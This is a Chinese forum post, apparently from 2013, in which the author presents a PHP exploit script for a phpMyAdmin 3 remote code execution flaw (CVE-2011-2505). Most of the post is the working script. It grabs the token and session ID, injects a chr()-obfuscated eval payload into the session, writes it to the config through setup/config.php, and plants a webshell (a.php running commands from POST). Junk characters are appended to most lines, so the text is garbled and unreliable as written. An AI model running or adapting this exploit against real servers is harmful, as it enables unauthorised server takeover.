最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。/ T7 S! U9 b- f2 Z0 h3 @, i
9 ^- a7 G6 A1 o* A" s) L; V3 y昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。( O" v) E. c! u: j
7 k- u( W8 a( E# b
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:, l# |" z9 _: W/ f# r
一是session.auto_start = 1;
6 M+ U% S4 X7 t' [4 y; ~二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
3 N5 }! d! q" E7 O, f! i1 h( U( Z# e当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。' d8 Q, U1 V; s8 D; R- `
5 L; ^# c7 H$ c: T在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。) _+ D5 r2 X) R1 F% | {4 \, m" ?
% v0 t+ ~' W* S" y/ {8 I
于是写了这个php版本的exp,代码如下:, h+ U+ w7 Z4 L, E) C, H2 o
# s1 p) n0 u- O, p' P5 b* |
#!/usr/bin/php
; N' u9 W# h. }/ e. |( y<?php8 ~7 N) n: h6 ]2 j% S2 l5 c8 c0 @% u
print_r('- n3 ]9 Z8 z! n& r
+---------------------------------------------------------------------------+- Z- W* v" k8 m ~+ B+ U
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
2 n1 B, w1 w$ J: F; Aby oldjun(www.oldjun.com). O' w3 o- c% ?
welcome to www.t00ls.net
# A6 a& G+ W3 Omail: oldjun@gmail.com
Q: e8 q8 o5 A) H# w2 \" mAssigned CVE id: CVE-2011-2505
& [4 z- B F( _9 V+---------------------------------------------------------------------------+
R F5 F. c# D0 ]' r2 [7 k');. p7 [: {% Q- L3 `" ^
* k' Q! F3 ]/ L* P
/**
/ j4 o6 I% ?' Q9 y- v2 e6 M' D * working when the directory:"config" exists and is writeable.
8 \( }0 V1 W. j1 ^# E7 B6 F+ F**/8 Z) [; D* l* ~' \: {. w
1 U1 i' c! v* R! Z
if ($argc < 3) {
( P, C8 e, V# Z7 A5 ~( N7 \ print_r('
; w+ C4 ?; E! Y& f* T' N+---------------------------------------------------------------------------+
O1 _" u$ O1 x$ aUsage: php '.$argv[0].' host path- ?6 Y1 H# i0 i5 R) T
host: target server (ip/hostname)
3 V( T, Y9 u9 m w3 Vpath: path to pma3
# ?6 l" U2 q3 e) c( v! w: V8 JExample:
. ]& G; g. [0 [# H: d; v5 G1 x$ x$ {php '.$argv[0].' localhost /pma/
2 G* E N0 Y! L2 p2 V* m( u1 B+---------------------------------------------------------------------------+; P9 L8 ~1 M. n# p
');
" z3 {9 n+ m% l. D K+ {5 [ exit;
# {8 W. m8 g5 H& ~: {$ P}
" Y3 j% S' n+ p( S0 O6 w
4 s& t+ N) @- s- v I+ X+ O$host = $argv[1];
% w$ e& U* ~; P/ S$ a0 r- ~$path = $argv[2];; i0 G( p3 ?4 y- t) m# t/ z
0 D& I2 b0 X5 r$ s; _/**
, E, j! i/ a0 {2 n3 n * Try to determine if the directory:"config" exists6 R3 ~+ }+ O8 n9 f2 @8 t7 W" ?
**/& `! n, T" p9 R* c" \( W, ?' p
echo "[+] Try to determine if the directory:config exists....\n";
1 @- V6 x3 t ^' C$returnstr=php_request('config/');* K9 t6 w* e% k, N* W! `, J
if(strpos($returnstr,'404')){, T7 \0 l/ |- N2 w' Y
exit("[-] Exploit Failed! The directory:config do not exists!\n");
+ m8 d8 I. E* R7 h}
# e; \4 [ t+ T2 a0 \; |6 t) s, A7 k1 Q2 J7 q v3 @5 u
/**: z' e }; k0 h1 E! y' `7 o* I
* Try to get token and sessionid- i7 L# t8 j/ E) l+ u
**/
9 R9 i8 c( n( G" P8 Mecho "[+] Try to get token and sessionid....\n";
# R9 h7 F1 h) r$result=php_request('index.php');
: p5 o7 Y2 _+ j" @) Z2 e9 U5 jpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp); R2 Y0 Q3 X# |% W3 L8 u
$token=$resp[3];
4 t+ O9 M5 @& J: ?+ v$sessionid=$resp[1];
: Q" I. Y4 Q8 Lif($token && $sessionid){
1 Q- a2 X: O! \. S echo "[+] token token\n";
4 |/ m! b% _, g9 d3 D echo "[+] Session IDsessionid\n";
5 H u9 _2 H* F: c" c5 o# E1 T+ p}else{. X7 X7 \$ U% |
exit("[-] Can't get token and Session ID,Exploit Failed!\n");* C5 q( N; [, h0 ^
}
3 ?; e7 x" A" M4 J3 [) e: Z2 M6 a
/**3 Q$ |5 i# O. |
* Try to insert shell into session
$ m/ n0 m6 O2 B ^9 E- k: M**/3 E- L% n. F/ \/ M8 Z" x& I6 ]
echo "[+] Try to insert shell into session....\n";
9 W- c6 W, L, @6 | f1 Kphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
# ? Z' W1 a/ }# L: z# h }6 a2 _5 C2 u3 H% n% T. v
/**
6 V: J" Z# C4 F. I% [, W * Try to create webshell+ I3 L& B3 O0 r0 V- h
**/
: Y0 `6 O) n8 necho "[+] Try to create webshell....\n";1 j d1 C- C- i2 G7 x4 o" P
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);; x, Y& m: O, G7 b7 `
/**
% C4 Q/ z/ A% z! D * Try to check if the webshell was created successfully
' i9 f8 _ {6 X**/
+ w. z* m4 ^5 ]1 Decho "[+] Try to check if the webshell was created successfully....\n";% v# U. o' Y9 t
$content=php_request('config/config.inc.php');
5 ?" v. k5 y5 N( S2 T6 wif(strpos($content,'t00ls')){
' r( V6 {4 U- J* q3 r' P! p echo "[+] Congratulations! Expoilt successfully....\n";
: M6 v* ?8 Y+ S echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
/ X2 U/ _! c3 ]}else{
8 F7 ^ N4 [' M exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
0 W# b2 F1 ?% ?: e6 ^}
3 A) [$ d+ ]% f# m: C' ]
$ A3 R: \5 l& [/ j. }, T* Lfunction php_request($url,$data='',$cookie=''){6 `# B" M0 f2 D; Z
global $host, $path;
/ C! F" T+ `$ z3 b \3 }% N # m+ m& L+ n, |% i
$method=$data?'POST':'GET';
: o+ U6 @7 s; K' v, S6 X
! T2 S9 J$ n9 Z w: d' N" z! F2 u; r $packet = $method." ".$path.$url." HTTP/1.1\r\n";
; u6 J! ?& A9 G $packet .= "Accept: */*\r\n";5 @2 e% s2 V& }2 Q/ I j
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
( s9 D# E" j' G% R, C2 Q) h T $packet .= "Host: $host\r\n";
8 B. k+ D& z- W3 T $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";# U1 w2 `/ S. o6 k2 m- F
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
% Z, Q8 a1 R) T. X3 J! | o( M $packet .= $cookie?"Cookie: $cookie\r\n":"";7 t/ O1 j" ?* g5 T1 C Y+ |
$packet .= "Connection: Close\r\n\r\n";
; F3 m. g& i+ B $packet .= $data?$data:"";
! w- N7 n; S m) N
7 u8 ]2 B- y! i- `! t $fp = fsockopen(gethostbyname($host), 80);" \: T& G ?# B1 F- ?2 \* ]: [
if (!$fp) {
: k% t$ Z& k2 j. H" \) T echo 'No response from '.$host; die;
) h" P' r; s. x u$ m, b' T% E! @+ e }
: L# u+ c5 h' k2 s M+ _ fputs($fp, $packet);8 b5 D0 S- A# Z- w4 X5 F/ C* n* ]
3 P6 y4 w- j! h5 e3 K2 [! R
$resp = '';9 t- Z7 s9 k4 ~3 g: c# k, _
, l* P6 U# }8 R) y3 j$ g
while ($fp && !feof($fp))
, c O: [& Y: g; M $resp .= fread($fp, 1024);
?2 Z3 ^! I' B" G- Z, t8 Y) y7 v2 [! {2 J- o: o
return $resp;
$ M/ C. t& D2 v0 v7 W# r6 N}
' \6 [0 V+ g" F+ @7 t
, t; \5 ]! D1 l' [8 }2 h# U?> ) M0 H( i4 {% j& U" D/ C/ A
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对